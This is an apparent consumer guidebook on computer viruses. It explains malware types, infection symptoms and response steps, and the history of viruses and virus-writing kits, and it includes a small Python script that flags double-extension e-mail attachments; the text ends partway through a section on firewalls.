Introduction

Defend Yourself

Perhaps the single most dreaded computing experience is when you find that your PC has been infected with a virus. Your data may be lost forever, and you can't keep your computer from crashing long enough to fix it. More often than not, you end up wasting precious constructive time trying to undo the damage caused.

The sad thing is, a majority of malicious software is written by some of the most brilliant computer minds across the world. Why, is a question best left unasked, as the working of individual human minds is too varied and complicated to comprehend.

This month, Digit Fast Track will take you through the world of viruses. You will find eight sections in this book, which will cover everything you need to know about viruses: from what viruses are and who makes them, to how to tell when, or check whether or not, you have been infected, to killing the viruses.

Each section will demystify an aspect of viruses that every user should know. We start with the basics in Chapter One: from what a virus is, how it works and the different types of viruses, to other types of malicious software and how to tell whether you have been infected. Chapter Two introduces you to the knights in shining armour, called antivirus applications, and what you should look for when trusting one to defend your PC and your data. Chapter Three will give you a little history about viruses; Chapter Four details the precautions you need to take in order to stay safe from attack, and Chapter Five takes an in-depth look at the best security software available today.

There is also a special White Papers section, where you can read some of the best literature ever written on this subject. There is also a Bibliography that recommends some excellent virus-related reading, both for the beginner and the expert, as well as a Glossary that demystifies hundreds of terms that may confuse you when reading about viruses or anti-virus technologies.

We hope this book is comprehensive enough to help the hundreds and thousands of readers to deal with and plan their security, and to keep their precious data safe from the millions of threats "out there".
The Virus Menace

Viruses: Know Your Enemy

You need to know your enemies before you can attempt to defeat them. This section will give you an in-depth look at what a virus really is, and how viruses work.

You will learn to differentiate between the different types of malicious code, and to tell whether your computer is infected or not.
1.1 What is a Virus?

Life as we know it today would be handicapped without computers. From basic communication, finances and even medical science, computers control just about everything that life in a modern society depends upon. In the ideal world, man would respect such power and work towards bettering it to progress as a civilisation. Unfortunately, that ideal world does not exist, which is why great breakthroughs are often followed by people who are hell-bent on bringing it all down. These people only see the weaknesses of an innovation in technology and will go to any lengths to exploit it, simply because they can. These are the people who create viruses.

A computer virus can be defined as an executable program that is capable of infecting other computer programs by modifying them to include a copy of itself. Just the way people can spread the common cold by being in contact with other people, a computer virus comes in contact with other programs to 'infect' them. By infecting programs, the virus is capable of spreading through an entire network of computers, infecting every machine that's incapable of protecting itself. While doing so, it could do a world of damage to your computer, which could cost you dear. The damage could consist of important files destroyed, corrupted data, slowing down of the infected computer, interrupted or unexpected closing of important programs, or it could be any or all of these; and chances are you won't realise that your computer is hit by a virus until it's much too late.

Viruses have grown in number and evolved in nature over the past decade. Before that, it was quite all right to have a basic and even outdated anti-virus program on your computer, which would scan floppies or CDs. That simple task would qualify as protection at the time, but we now need active anti-virus programs, constantly running, checking every file you download or execute.

1.2 How Viruses Work

There are tens of thousands of viruses out there, and new ones are discovered every day. It is difficult to come up with a generic explanation of how viruses work, since they all have variations in the way they infect or the way they spread. So instead, we've taken some broad categories that are commonly used to describe various types of virus.

File Viruses (Parasitic Viruses)

File viruses are pieces of code that attach themselves to executable files, driver files or compressed files, and are activated when the host program is run. After activation, the virus may spread itself by attaching itself to other programs in the system, and also carry out the malevolent activity it was programmed for. Most file viruses spread by loading themselves into system memory and looking for any other programs located on the drive. If it finds one, it modifies the program's code so that it contains and activates the virus the next time it's run. It keeps doing this over and over until it spreads across the system, and possibly to other systems that the infected program may be shared with.

Besides spreading themselves, these viruses also carry some type of destructive constituent that can be activated immediately or by a particular 'trigger'. The trigger could be a specific date, or the number of times the virus has been replicated, or anything equally trivial. Some examples of file viruses are Randex, Meve and MrKlunky.
Boot Sector Viruses

A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating system to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence.

A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect pre-written data on a CD, which eventually stopped such viruses from spreading.

Though boot viruses still exist, they are rare compared to new-age malicious software. Another reason why they're not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive. Examples of boot viruses are Polyboot.B and AntiEXE.

Multipartite Viruses

Multipartite viruses are a combination of boot sector viruses and file viruses. These viruses come in through infected media and reside in memory. They then move on to the boot sector of the hard drive. From there, the virus infects executable files on the hard drive and spreads across the system.

There aren't too many multipartite viruses in existence today, but in their heyday, they accounted for some major problems due to their capacity to combine different infection techniques. A significantly famous multipartite virus is Ywinz.
Macro Viruses

Macro viruses infect files that are created using certain applications or programs that contain macros. These include Microsoft Office documents such as Word documents, Excel spreadsheets, PowerPoint presentations, Access databases, and other similar application files such as Corel Draw, AmiPro, etc.

Since macro viruses are written in the language of the application, and not in that of the operating system, they are known to be platform-independent: they can spread between Windows, Mac, and any other system, so long as they're running the required application. With the ever-increasing capabilities of macro languages in applications, and the possibility of infections spreading over networks, these viruses are major threats.

The first macro virus was written for Microsoft Word and was discovered back in August 1995. Today, there are thousands of macro viruses in existence; some examples are Relax, MelissaA and Bablas.
Network Viruses

This kind of virus is proficient in quickly spreading across a Local Area Network (LAN) or even over the Internet. Usually, it propagates through shared resources, such as shared drives and folders.

Once it infects a new system, it searches for potential targets by scanning the network for other vulnerable systems. Once a new vulnerable system is found, the network virus infects the other system, and thus spreads over the network. Some of the most notorious network viruses are Nimda and SQLSlammer.

E-mail Viruses

An e-mail virus could be a form of a macro virus that spreads itself to all the contacts located in the host's e-mail address book. If any of the e-mail recipients open the attachment of the infected mail, it spreads to the new host's address book contacts, and then proceeds to send itself to all those contacts as well. These days, e-mail viruses can infect hosts even if the infected e-mail is merely previewed in a mail client. One of the most common and destructive e-mail viruses is the ILOVEYOU virus.

There are many ways in which a virus can infect or stay dormant on your PC. However, whether active or dormant, it's dangerous to let one loose on your system, and it should be dealt with immediately.
1.3 Other Malicious Software

Earlier, the only way a computer was at risk was when you inserted an infected floppy. With the new age of technology, every computer is interconnected to the rest of the world at some point or the other, so it's difficult to pinpoint the source and/or time of the infection. As if that weren't bad enough, new-age computing has also brought about a new breed of malicious software. Today, the term 'virus' has become a generic term used for all the different ways that your computer can be attacked by malicious software. Besides the types of viruses we mentioned in Chapter 1.2, here's a look at some of the newer problems we face today.

Trojan Horses: The biggest difference between a Trojan horse (or Trojan) and a virus is that Trojans don't spread themselves. Trojan horses disguise themselves as useful software available for download on the Internet, and naive users download and run them only to realise their mistake later.

A Trojan horse is usually divided into two parts: a server and a client. It's the client that is cunningly disguised as important software and placed in peer-to-peer file sharing networks, or unofficial download sites. Once the client runs on your system, the attacker (the person running the server) has a high level of control over your system, which can lead to devastating effects depending on the attacker's intentions. Trojan horses have evolved to a tremendous level of sophistication, which makes each one significantly different from the other. We have categorised them roughly into the following:


o Remote Access Trojans: These are the most commonly available Trojans. These give an attacker complete control over the victim's computer. The attacker can go through the files and access any personal information about the user that may be stored in the files, such as credit card numbers, passwords, and important financial documents.

o Password-sending Trojans: The purpose of such Trojans is to copy all cached passwords and look for other passwords as you enter them, and send them to a specific mail address, without the user's knowledge. Passwords for restricted Web sites, messaging services, FTP services and e-mail services come under direct threat with this kind of Trojan.

o Destructive: The only function of these Trojans is to destroy and delete files. They can automatically delete all the core system files on your machine. The Trojan could be controlled by the attacker or could be programmed to strike like a logic bomb, starting on a specific day or at a specific hour.

o Keyloggers: These log victims' keystrokes and then send the logs to the attacker. The attacker then searches for passwords or other sensitive data in the log files. Most of them come with two functions, such as online and offline recording. Of course, they can be configured to send the log file to a specific e-mail address on a daily basis.

o Denial of Service (DoS) Attack Trojans: The main idea behind this kind of Trojan is to generate a lot of Net traffic on the victim's machine, to the extent that the Internet connection is too overloaded to let the user visit a Web site or download anything. Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail addresses with random subjects and contents that cannot be filtered.

o Proxy/Wingate Trojans: These types of Trojan turn the victim's computer into a proxy/wingate server. That way, the infected computer is available to the whole world to be used for anonymous access to various risky Internet services. The attacker can register domains or access pornographic Web sites with stolen credit cards or do similar illegal activities without being traced.

o FTP Trojans: These Trojans are probably the simplest, and are outdated. The only thing they do is open port 21 (the port for FTP transfers) and let everyone connect to your machine. Newer versions are password-protected, so only the attacker can connect to your computer.

o Software Detection Killers: These Trojans kill popular antivirus/firewall programs that protect your machine, to give the attacker access to the victim's machine.

A Trojan could have any one or a combination of the above-mentioned functionalities.

Worms: Computer worms are programs that reproduce and run independently, and travel across network connections. The main difference between viruses and worms is the method in which they reproduce and spread. A virus is dependent upon a host file or boot sector, and the transfer of files between machines, to spread, while a worm can run completely independently and spread of its own accord through network connections.

The security threat of worms is equivalent to that of a virus. Worms are capable of doing a whole range of damage such as destroying essential files in your system, slowing it down to a great extent, or even causing some essential programs to crash. Two famous examples of worms are the MS-Blaster and Sasser worms.

Spyware: Spyware is the new-age term for advertising-supported software (Adware). Advertising in shareware products is a way for shareware authors to make money, other than by selling it to the user. There are several large media companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. If the user finds the banners annoying, there is usually an option to get rid of them by paying the licensing fee.

Unfortunately, the advertising companies often also install additional tracking software on your system, which is continuously using your Internet connection to send statistical data back to the advertisers. While the privacy policies of the companies claim there will be no sensitive or identifying data collected from your system and that you shall remain anonymous, the fact remains that you have a server sitting on your PC that is sending information about you and your surfing habits to a remote location, using your bandwidth.

Spyware has been known to slow down computers with its semi-intensive usage of processing power, bringing up annoying pop-up windows at the most inappropriate times and changing your Internet browsing settings, such as your home page or default search engine, to its own services.

Even if many do not consider this illegal, it is still a major security threat, and the fact that there's no easy way to get rid of them makes them as much of a nuisance as viruses.

Logic Bombs: A logic bomb is a program which has deliberately been written or modified to produce results, when certain conditions are met, that are unexpected and unauthorised by legitimate users or owners of the software. Logic bombs may reside within standalone programs, or they may be part of worms or viruses. A variation of the logic bomb is the time bomb that 'explodes' at a certain time. An example of a time bomb is the infamous 'Friday the 13th' virus.
There's never really a way of being truly protected from viruses, especially when your computer is always connected to some form of network. There are chances that a virus will get to your computer before the resident anti-virus program is even aware of its existence. Still, there are ways to avoid infection by following a set of simple guidelines.

o Make sure you have a clean boot CD handy at all times. Your original operating system installation CD should be bootable, so that will do.

o If your anti-virus has an option of making a bootable CD, take some time off to make one of those. You will appreciate the effort if the need ever arises.

o Use a well-reputed anti-virus software and update it daily.

o Make sure your anti-virus automatically scans any newly inserted discs for viruses, especially if you tend to exchange data between your office and home computers.

o Avoid opening mails with attachments unless you're absolutely sure they are from trusted sources.

o If you're using an e-mail client on your computer such as Microsoft Outlook, Outlook Express or Mozilla Thunderbird, disable the message preview pane. This way you can filter the messages you open by the sender's name or the subject line.

o Keep all your documents and important programs backed up on a CD, or any other storage media.

Taking these steps won't guarantee that you stay virus-free, but you will surely be more protected and prepared for a virus attack.
1.5 Common Symptoms and Precautions

The problem with virus attacks is that unless your anti-virus tells you, you have no way of being sure that your computer is not infected. Still, there are a few symptoms that you should look out for. These include:

o Your computer always stops responding when you try to use certain software. This could also take place due to corruption of an essential file required by that software.

o You received an e-mail message that has a strange attachment. When you open the attachment, dialog boxes appear, or a sudden degradation in system performance occurs.

o There is a double extension on an attachment that you recently opened, such as .jpg.vbs or .gif.exe.

o An anti-virus program is disabled for no reason and it cannot be restarted. The computer may not allow re-installation of the anti-virus.

o Strange dialog boxes or message boxes appear on the screen.

o Someone tells you that they have recently received e-mail messages from you containing infected attached files, and you are sure you never sent any such mails.

o New icons that you did not place on the Desktop appear, and are not associated with any recently installed programs.

o Strange sounds or music plays from your speakers unexpectedly.

o A program disappears from the computer, and you didn't uninstall it.

o Windows will not start because certain critical system files are missing, and you receive error messages listing those files.

o The computer starts as expected some of the time, but at other times stops responding before the desktop icons and taskbar appear.

o The computer runs very slowly and it takes a long time to start.

o Out-of-memory error messages appear, even though your computer has plenty of RAM.

o New programs do not install properly.

o Windows restarts unexpectedly.

o Programs that used to run now stop responding frequently. If you try to remove and reinstall the software, the issue continues to occur.

o A partition completely disappears.

Note that none of the above is a sure-shot sign of a virus infection. There could always be a software glitch, or a loose data cable, or even mere compatibility issues that could be causing such errors. The best thing to do is always keep an anti-virus installed on your computer.
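The double-extension symptom in the list above can be checked mechanically rather than by eye. The following Python script is an added example and not code from the book: it splits an attachment name into its extensions, removes the spaces a mail client may render around the dots, and reports whether an executable extension is hiding behind a data extension. The extension sets and the sample attachment names are assumptions constructed for the example.

```python
"""Flag attachment names that hide an executable behind a harmless-looking
'double extension' such as photo.jpg.vbs or picture.gif.exe.

Added example for this section; the extension sets and sample names below
are constructed for illustration, not taken from the book."""

import re

# Extensions Windows runs as code when the file is double-clicked.
# Assumption: a representative set, not an exhaustive one.
EXECUTABLE_EXTENSIONS = {
    "exe", "com", "bat", "cmd", "scr", "pif", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "msi", "cpl", "lnk", "ps1",
}

# Extensions a user reads as plain data (pictures, documents, media).
DATA_EXTENSIONS = {
    "jpg", "jpeg", "gif", "png", "bmp", "txt", "doc", "xls", "pdf",
    "mp3", "avi", "mpg",
}


def split_extensions(filename: str) -> list:
    """Return the lower-cased extensions of a file name, in order.

    'Holiday.JPG.Exe' -> ['jpg', 'exe'].  Whitespace around the dots is
    removed first, because a name such as 'picture.gif.        exe' pads
    the real extension out of view in a narrow attachment pane.
    """
    name = re.sub(r"\s*\.\s*", ".", filename.strip())
    parts = name.split(".")
    return [part.lower() for part in parts[1:]]  # parts[0] is the base name


def classify_attachment(filename: str) -> str:
    """Classify one attachment name.

    'safe'       - does not end in an executable extension
    'executable' - ends in an executable extension and says so openly
    'disguised'  - an executable extension sits behind a data extension,
                   the double-extension trick described in the text; with
                   Windows' "hide extensions for known file types" setting
                   on, 'photo.jpg.exe' is shown to the user as 'photo.jpg'.
    """
    extensions = split_extensions(filename)
    if not extensions or extensions[-1] not in EXECUTABLE_EXTENSIONS:
        return "safe"
    if len(extensions) >= 2 and extensions[-2] in DATA_EXTENSIONS:
        return "disguised"
    return "executable"


def scan_attachments(filenames) -> list:
    """Return (name, verdict) pairs for every name that is not 'safe'."""
    flagged = []
    for name in filenames:
        verdict = classify_attachment(name)
        if verdict != "safe":
            flagged.append((name, verdict))
    return flagged


# Constructed sample attachment names, including the pattern the ILOVEYOU
# worm's mail used (a name that reads as a .TXT document but ends in .vbs).
SAMPLE_ATTACHMENTS = [
    "holiday.jpg",
    "LOVE-LETTER-FOR-YOU.TXT.vbs",
    "picture.gif. exe",
    "quarterly-report.pdf",
    "setup.exe",
    "archive.tar.gz",
]

if __name__ == "__main__":
    for name, verdict in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"{verdict:10s} {name}")
```

A mail gateway or a desktop helper can run the same check on every incoming attachment and hold anything reported as 'disguised' for a virus scan before the user sees it.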
As we mentioned above, there are chances that the erratic behaviour may not even be a virus, especially if it's not detected by the resident anti-virus. Still, to be safe, run a complete virus scan on your computer with the latest anti-virus definitions for the installed anti-virus scanner. If you don't have an anti-virus installed, or think it may not be capable of detecting the virus, you can run an online virus scan from any of the Web sites mentioned in Chapter 2.6.

If a virus is detected, use the steps provided in Chapter 2.5 to get rid of it. In case you feel that you may do more harm than good on your own, and might prefer to have an expert handling the situation, then take the following steps as a precautionary measure:

o If your computer is connected to a network, unplug the network cable from your computer.

o Switch off the computer. Use the proper shutdown sequence instead of simply switching off the power. Using an infected computer may simply increase the chances of spreading the virus, or may give the virus ample time to do its damage.

o Only switch the computer back on when you are ready to rid the computer of the virus.

o Advise users of the other computers on the network to scan their machines, just to make sure that the virus hasn't spread there already.

o Make sure that the uninfected computers on the network have some protection against the detected virus. This should be considered top priority.

o Do not share CDs or DVDs that were burnt on the infected PC without scanning them for viruses first. The same applies to Zip drives or any other writable media that was connected to the infected computer at some time.

The point of the above exercise is to quarantine the infected computer from the uninfected ones till the virus problem is taken care of.
"I have but one lamp by which my feet are guided, and that is the lamp of experience. I know no way of judging the future but by the past."

Edward Gibbon
British Historian

This section will take you on a trip down virus-memory lane, and also give you an insight into the people who create them.
3.1 A Brief History Of Viruses

In this book we have studied viruses up close and personal, but do we know their entire story? Where did they all begin? What was the purpose behind the creation of the very first virus? What made viruses evolve to this level? For answers to these questions, we need to look at the history of computer viruses.

Once Upon a Time...

The when and the where of the very first virus is a little fuzzy to history. The first program which showcased properties of what we now call viruses was called Elk Cloner, a program for the then popular Apple II; this was in 1981. Elk Cloner was quite the fairy-tale character, restricting itself to a fairly harmless rhyme that went like so:

It will get on all your disks
It will infiltrate your chips
Yes it's Cloner!

It will stick to you like glue
It will modify RAM too
Send in the Cloner!

Evidently, it was nothing more than a programmer's prank.

Then the world moved on to the mid-'80s; IBM had just created this little thing they called the PC, maybe you have heard of it. It was about the time when viruses started humming tunes of a more destructive nature. One of the first PC viruses discovered was known as the Brain virus, written by two brothers residing in Pakistan. Brain was a boot-sector virus, infecting 360K floppy disks, but not hard drives. It would occupy unused space on a floppy such that the disk would become useless. Interestingly, Brain was also the first "stealth" virus, hiding itself from detection: if a computer user tried to view the disk sector, Brain would display the original, uninfected boot sector.
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Alongside  Brain,  the  80’s  saw  other  major  viruses  such  as 
“Vienna”  and  “Cascade”.  This  twosome  created  something  of  an 
epidemic  between  1987-89.  PC  users  still  remember  those  days: 
letters  would  drop  from  displays  making  people  draw  the  obvious 
conclusion  that  there  was  something  wrong  with  their  monitors. 
It  wasn’t  the  best  of  times  if  your  job  description  involved  servic- 
ing monitors.  But  cascading  letters  weren’t  the  only  thing  infect- 
ed computers  would  display.  Some  would  start  playing  the 
“Yankee  Doodle”  number...  weird  times,  for  sure. 

With  viruses  suddenly  and  irritatingly  popping  up  from  the 
most  unlikely  of  sources,  the  time  was  now  for  saviours.  People 
were  desperate  for  solutions.  And  so  there  appeared  antidotes.  Like 
the  malady,  the  first  cure  is  hard  to  pinpoint.  Which  was  the  first 
antivirus,  is  difficult  to  identify  but  it  wasn’t  until  1990  that  a vis- 
ible number  of  solutions  were  introduced.  And  when  it  rained,  it 
poured.  Antivirus  solutions  were  aplenty,  including  software  from 
IBM,  McAfee,  Digital  Dispatch  and  Iris.  Only  a handful  of  them  have 
survived  to  this  day  and  even  fewer  grew  from  little  more  than  a 
garage  project  to  major  players  in  the  computer  security  market. 
Antivirus  software  had  arrived  and  not  a moment  too  soon. 

Come  1990  and  viruses  started  displaying  a variety  of  charac- 
teristics. These  included  Polymorphism— encrypted  viruses  where 
the  decryption  routine  code  was  variable,  Armoring— to  prevent 
antivirus  researchers  from  dissembling  a virus  and  Multipartite- 
able  to  infect  both  programs  and  boot  sectors. 

The  first  polymorphic  virus  was  called  “Chameleon”.  By  April 
1991,  everyone  was  taking  shots  of  “Tequila”— a virus  which  was 
Stealth,  Polymorphic  and  Multipartite;  a very  real  and  problemat- 
ic threat.  Suddenly,  viruses  became  a lot  more  threatening. 

After  Tequila,  the  idea  of  a self-encrypting,  polymorphic  virus 
gained  popularity  in  the  wrong  circles  and  spawned  a completely 
unique  software— a polymorphic  code  generator.  Creating  slippery 
viruses  was  now  much  simpler. 
In early 1992 the famous "Dedicated" virus appeared, based on the
first known polymorphic generator, the MtE, and the first in a series
of MtE-based viruses. The polymorphic generator was essentially an
object module (OBJ) file; to get a polymorphic mutant virus from a
conventional non-encrypting virus, one only needed to link two object
modules together: the polymorphic OBJ file and the virus OBJ file. The
era of "script kiddies" had dawned, and with it an industry of
do-it-yourself, 30-minute viruses. Soon, books promising to teach you
how to write viruses in weeks made their appearance.

The Michelangelo virus was the first media darling. Much like the Y2K
anti-climax, Michelangelo was heralded by doom-and-gloom alerts, with
predictions of massive, worldwide damage. In actuality, very little
happened! The same year, the Dark Avenger Mutation Engine (DAME)
became the first toolkit that could be used to turn any virus
polymorphic. By 1993, polymorphic viruses were populous in virus
land. Some celebrities from that era: Bootache, CivilWar, Crusher,
Dudley, Fly, Freddy, Ginger, Grog, Haifa, Moctezuma, MVF, Necros,
Nukehard, PcFly, Predator, Satanbug, Sandra, Shoker, Todor, Tremor,
Trigger and Uruguay.

These viruses required special methods of detection, including
emulation of the virus's executable code and mathematical algorithms
for restoring parts of the code and data in the virus. Polymorphic
generators were also proliferating alongside their progeny. Several
new ones appeared, utilising complex methods of generating
polymorphic code. By the end of 1993 there were four known generators
of polymorphic code: MTE 0.90 (Mutation Engine), four versions of TPE
(Trident Polymorphic Engine), NED (Nuke Encryption Device) and DAME
(Dark Angel's Multiple Encryptor).

Generation  Next 

As viruses got more prominent, the means to create them kept getting
easier, and sometime in the middle of 1992 the first do-it-yourself
virus kit appeared. On July 5, 1992, the first viral code construction
set for IBM PC compatibles, called VCL (Virus Creation Laboratory)
version 1.00, was unleashed. This set allowed generating
well-commented source texts of viruses in the form of assembly
language texts, object modules and infected files themselves.

VCL used a standard WIMP interface: with the help of a menu system one
could choose a virus type, the types of files to infect (COM and/or
EXE), the presence or absence of self-encryption, measures of
protection from debugging, embedded text strings, plus some 10
additional "effects". Viruses could now use a standard method of
infecting a file by adding their body to the end of the file, replace
files with their body (destroying the original content of the file),
or become companion viruses. A virus creator not only had the tool but
also a choice.

These generator kits kept getting better, and the 27th of July saw the
first version of PS-MPC (Phalcon/Skism Mass-Produced Code Generator).
This set used a configuration file to generate viral source code. The
file contained a description of the virus: the type of infected files
(COM or EXE); resident capabilities (unlike VCL, PS-MPC could also
produce resident viruses); the method of installing the resident copy
of the virus; self-encryption capabilities; the ability to infect
COMMAND.COM; and lots of other useful information.

As time went by, virus construction kits got smarter, simpler and more
effective. Bad news for the rest of us: practically every teenager
with a bad social life and time to spare was churning out viruses.
Over the years there have been several hundred VCL- and G2-based
viruses and thousands of PS-MPC-based viruses.

In 1995, Microsoft released the revolutionary Windows 95, and
antivirus companies were worried that nobody would need them anymore.
The most common viruses were still boot viruses that worked on DOS but
wouldn't replicate on Windows 95. Little did they know... Sometime the
same year, macro viruses appeared. These viruses worked in the MS Word
environment. The antivirus industry would keep its job.
The first macro virus went by the name "Concept", and it was pretty
much unchallenged. Concept soon proliferated to thousands, if not
millions, of computers in no time at all. Data exchange in MS Word was
by now an industry standard: to get infected by Concept, one only
needed to open a colleague's file; soon all the documents edited by
this newly infected copy of Word would become carriers, and the spiral
would continue. Adding fuel to this fire was a little thing called the
Internet. The reality of infecting frequently used files at the speed
of the Internet became one of the most serious problems in computing
history.

With time, other macro viruses came into place. In the summer of 1996
there appeared the "Laroux" virus, infecting Microsoft Excel
spreadsheets. As it had been with "Concept", these new viruses were
discovered almost simultaneously by several companies. Of course,
following the pattern of virus history, macro virus construction sets
soon began to appear, giving rise to newer and more dangerous kinds of
viruses. In the beginning of 1997 came the first polymorphic macro
virus for MS Word and the first viruses for Microsoft Office 97. The
number of macro viruses also increased steadily, reaching several
hundred by the summer of 1997. As problematic as macro viruses were
(and they are still a big problem), macros were not the sole attack
vector.

Threats,  Threats  Everywhere! 

Macro viruses were not the only new threat in 1995. With the rise in
popularity of the Internet, hackers made their presence felt. The
Internet gave a lot of opportunities to hackers everywhere. There were
all these unsecured servers running important web sites and containing
vital information, just waiting to be hacked. No one was prepared, and
the hackers took advantage of it. Hacking soon became the next 'cool'
thing, with every teenager trying desperately to learn it to impress
his friends.

Hackers attacked the Griffith Air Force Base, the Korean Atomic
Research Institute, NASA's Goddard Space Flight Center near Washington
DC, and its Jet Propulsion Laboratory. Even GE, IBM, Pipeline and
other companies were all hit by the "Internet Liberation Front" on
Thanksgiving.

But all was not bad, as these troubled times gave rise to ethical
hackers and some of the smartest brains ever to grace the information
technology field.

Soon, common vulnerabilities in systems were well known, and while the
creators of these systems attempted to plug holes, the script kiddies
played mischief. Hacking gave rise to Trojan horses; these new tools
didn't require foreknowledge of how systems worked, just the skill to
press buttons in the correct sequence. The first Trojan was discovered
in 1998 and went by the infamous name "Back Orifice". Back Orifice was
a tool that allowed remote administration of any computer that it
infected. With Back Orifice, people could take over remote computers,
open any files, delete whatever they wished and do just about anything
harmful they wished.

While viruses poured in, all was not well in the antivirus camp. In
1997 almost all antivirus vendors were fighting each other in court,
or just making a noise about each other. McAfee's "The Number One
Choice Worldwide. No Wonder The Doctor's Left Town" led to name
calling with its biggest rival, Dr Solomon. McAfee was also in court
with Trend Micro over the patent for e-mail data scanning.

Dr Solomon was accused of "cheating", because its scanner supposedly
shifted into "Advanced Mode" when it detected a virus, thus enabling
it to catch a lot of other viruses that would otherwise be invisible
under the "Normal Mode". McAfee claimed that this was the reason Dr
Solomon was fast at scanning uninfected disks and caught more viruses
in tests performed with virus collections, though we still fail to see
how this was a "bad" feature for an antivirus to have. Symantec was
also accusing McAfee of using Symantec code in McAfee products.
Needless to say, there was a lot of squabbling.

However, the year ended on a noteworthy event: McAfee Associates and
Network General declared a consolidation, and Network Associates was
born. This company promised antivirus solutions in addition to
encryption and network administration services. This was the birth of
NAI. Eventually, Dr Solomon was bought by NAI for US $640 million. The
event shocked the antivirus world, as the conflict between the two
antivirus giants was made a thing of the past with a simple bargain.
In the process, one of the most notable and technologically strong
antivirus software manufacturers lost its identity.

The year 1999 opened a chapter which even today poses a major threat.
Melissa was the first combination of a macro virus and a worm. It used
Outlook and Outlook Express to send itself to others via e-mail.
Antivirus software scrambled to scan your e-mails, certify virus-free
e-mails and clog bandwidth with unfortunate but needed overhead.
Melissa, of course, birthed similar threats: the e-mail worms.

Today, the virus threat has increased to a level where simple
antivirus packages no longer cut it. With spyware, worms, Trojans and
other malicious software attacking from every medium, we now need more
complete security solutions. Indeed, Microsoft has taken security to
heart (never too late to start) and is promising to fight the threat
of malicious software headlong.


3.2 The Mind Of A Virus Writer


So what makes a person create a virus? What is he trying to prove by
spreading chaos and destruction that can only win him jail time if
caught? The popular perception of a virus writer is that of a
dysfunctional, pimple-faced teenager with no girlfriend and no life,
who taps out malicious code to a backbeat of trance music. It is a
very Hollywood profile, and not exactly the most accurate one. Recent
research shows that most virus coders are well-adjusted youths who
have normal relationships with their family and friends and intend no
real harm with the viruses they write... which is a big problem.
The trouble is, they don't believe that their code can actually hurt
anyone, which is the frame of mind of most teenagers anyway. Some do
it out of personal curiosity or to prove a point; others do it to
impress their peers, while still others do it to enter the
underground computing communities. These communities often consider
virus writers the bottom of their hierarchy and place hackers at the
top.

Virus writers represent the wild, unpredictable younger siblings
whose unleashed programs are uncontrollable. Hacking, on the other
hand, involves different and more refined skills. A hacker tends to
target a specific computing system and make a surgical strike. While
hacking is all about gaining control, virus writing is all about
uncontrolled mayhem.

Like any adolescent, virus writers tend to mature and change their
ways. Most quit the activity once they understand the ramifications
of a virus unleashed. Ten years back, virus writers fell in the 14 to
17 year old bracket, while today they're 25 to 28. Women have also
been known to write viruses. Like all things social, it is difficult
to define the mind of a virus writer.

These days the Internet makes it easy to share source code. In the
early days of the boot sector viruses, writers needed a certain level
of programming skill. Things only got simpler and easier. What's more,
virus writers show off their source code at Web sites and distribute
the kits we have covered above. Anybody with the inclination can now
create a virus.

Society also sends mixed signals to potential virus creators. While
the law seeks to throw them behind bars, security companies have been
known to hire them either as consultants or as part of their
workforce. Even the press paints them as code cowboys, wild men who
live dangerously and on the edge. The attraction is obvious.

So what's the motivation? Malicious intent, honing software skills,
exploiting vulnerabilities, experiments, revenge, hobby, peer
acceptance, pride... The reasons are as varied as the viruses.
Not even the best software can save you from disasters if you are not
careful about certain things. This section will explain all the
necessary precautions you should take, and continue to take, in order
to protect your computer from malicious software.
4.1 Patching For Security


The stark reality of life: all software must be patched at some time
or another! No, this is not an exaggerated statement. No matter how
perfect a piece of software seems when it's released, people are
bound to find bugs and security holes in the code. So, to fix these
niggling problems, software companies release patches on a regular
basis. This really isn't a big deal for offline programs such as your
CD burning utility or your image editor, but with any program that
functions by connecting to the Internet (an e-mail client, a Web
browser or even a media player) patching is a priority.

So which software do you need to update? Ideally, you should update
all drivers and programs that you use on a regular basis. Your top
priority, however, is to keep your operating system updated with the
latest patches. Luckily, newer Windows OSes such as Windows 2000 and
Windows XP already come with a Windows Update utility that informs you
of any new security fixes released for the OS. If you make updating a
ritual, your computer will be better prepared to handle the majority
of exploits that come out. The best solution for the Sasser worm, to
date, is a Windows Update session. Many Linux distribution companies
also offer this service.


Upgrading the programs you run on a regular basis is also important.
A lot of exploits are found in everyday programs such as browsers and
instant messengers, which can leave your computer open to Trojans and
even hacker attacks. It's best to keep the auto-update option on for
these programs, if available, so you don't have to bother checking
for updates yourself.

AutoPatcher 

For those who can't update their operating systems regularly, there's
one application that could be the answer to all your prayers:
AutoPatcher. Available for Windows 2000, Windows XP and Windows 2003,
AutoPatcher is a collection of essential patches and updates that have
been released for the respective operating systems. Updates include
essential patches for the main OS kernel, Internet Explorer, Outlook
Express and other Microsoft products. Besides these, it also contains
some great freeware to tweak and enhance your computing experience,
along with the latest versions of some commonly used utilities.


AutoPatcher is also helpful when you do a fresh install of your
Windows OS. Instead of running all the patches one after the other
manually, or wasting bandwidth connecting to Windows Update and
re-downloading everything again, AutoPatcher can automatically detect
the updates needed and patch up your Windows install for you.
AutoPatcher is regularly provided with the Digit DVD.


[Screenshot: AutoPatcher 4.6 - August '04 - Gold - Full (August 2004).
The welcome screen lists the components it will update on the Windows
installation: Microsoft Windows XP Pre-SP2 Patches (Critical and
Recommended); Microsoft Internet Explorer and Outlook Express Patches;
Microsoft Windows XP Optional Tools and Components (Bootvis Tool
version 1.3.37, Copy Profile Tool); and the option "Allow Windows to
keep hotfix backups for uninstall (Recommended)".]
4.2 Firewalls And Other Methods Of Protection


Firewalls were once used only by network administrators to safeguard
their servers from unauthorised entry by hackers. The new age of
Internet threats and the rise in malicious software mean that
firewalls are now something of a necessity for every computer. Why
else would Microsoft include a firewall with its Windows XP SP2
operating system? But before we get into that, let's talk about the
basics, starting with what a firewall really is.

In the traditional sense, a firewall is a hardware device or software
application that functions in a networked environment to prevent
communication that is forbidden by security policy. It filters all
network packets and determines whether to allow or block them. It
achieves this by screening requests and determining whether they
originate from known and reliable sources. When an unauthorised entry
